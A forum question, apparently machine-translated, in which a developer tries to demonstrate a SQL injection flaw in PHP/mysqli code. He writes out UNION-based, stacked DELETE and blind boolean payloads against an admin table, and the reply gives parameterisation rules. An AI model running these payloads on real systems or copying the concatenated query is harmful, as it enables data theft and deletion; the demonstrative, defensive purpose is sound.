SQL Injection with MySQL (fun call)

One developer has just introduced a SQL injection vulnerability on a website that I support, and I want to show how easy it can be to use; but there are a few problems.

Taking SQL, roughly speaking:

SELECT c.id, c.name, c.start FROM course AS c WHERE MONTH(c.start) = $_GET['month'] ORDER BY c.start 

If I set $_GET['month'] to:

 13 UNION SELECT 1, username, 3 FROM admin 

This will run the request:

 SELECT c.id, c.name, c.start FROM course AS c WHERE MONTH(c.start) = 13 UNION SELECT 1, username, 3 FROM admin ORDER BY c.start 

What will work if ORDER BY did not include the table alias c. . Instead, this results in an error:

 Table 'c' from one of the SELECTs cannot be used in field list 


Adding c ALIAS to admin doesn't matter either:

 13 UNION SELECT 1, c.username, 3 FROM admin AS c 


I tried using -- to comment on ORDER BY, but this does not work because it is on a new line:

 13 UNION SELECT 1, c.username, 3 FROM admin AS c -- 

Similarly /* will not work, because I cannot add the final */ :

 13 UNION SELECT 1, c.username, 3 FROM admin AS c /* 

Split requests

It also seems that mysqli_prepare() does not like ; anywhere in the query - so DROP, DELETE or TRUNCATE will result in a SQL syntax error:

 13; DELETE FROM admin; 


At the moment, the only thing I can think of is to add to the WHERE clause so that the attacker can get a yes / no answer (some recordings or recordings without recording), as well as the following: but this is less satisfactory than viewing the recordings appear on the screen :-)

 SELECT c.id, c.name, c.start_estimate FROM thr_course_term AS c WHERE MONTH(c.start_estimate) = 13 OR 1 = (SELECT 1 FROM thr_admin WHERE username LIKE "crai%") ORDER BY c.start_estimate; 


SQL runs in PHP with mysqli , and the code is crude:

 <?php $month = '13 UNION SELECT 1, username, 3 FROM admin'; // from $_GET['month'] $sql = 'SELECT c.id, c.name, c.start FROM course AS c WHERE MONTH(c.start) = ' . $month . ' ORDER BY c.start'; $link = mysqli_connect('localhost', 'username', 'password', 'database'); $statement = mysqli_prepare($link, $sql); if (!$statement) { echo $link->error; } else { // Skip the bind_param bit $result = $statement->execute(); $result = $statement->get_result(); while ($row = mysqli_fetch_assoc($result)) { print_r($row); } } ?> 
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1 answer

There is no point in demonstrating any use methods.

On the one hand, the number of possible exploits is infinite. You can fill the whole of Qaru with examples. However, none of them will add anything to protect the methods. You see, the rules of defense are short and clear. It makes no sense to remember hundreds of possible exploits to protect your site. All you need to do is learn a few rules:

  • All data literals must be added through placeholders.
  • All other parts of the request must be white.

It's all.

On the other hand, to demonstrate the danger, the example of old Bobby Stoll is enough. If this did not convince you, I doubt that any number of other exploit examples will be done.


Source: https://habr.com/ru/post/1011813/

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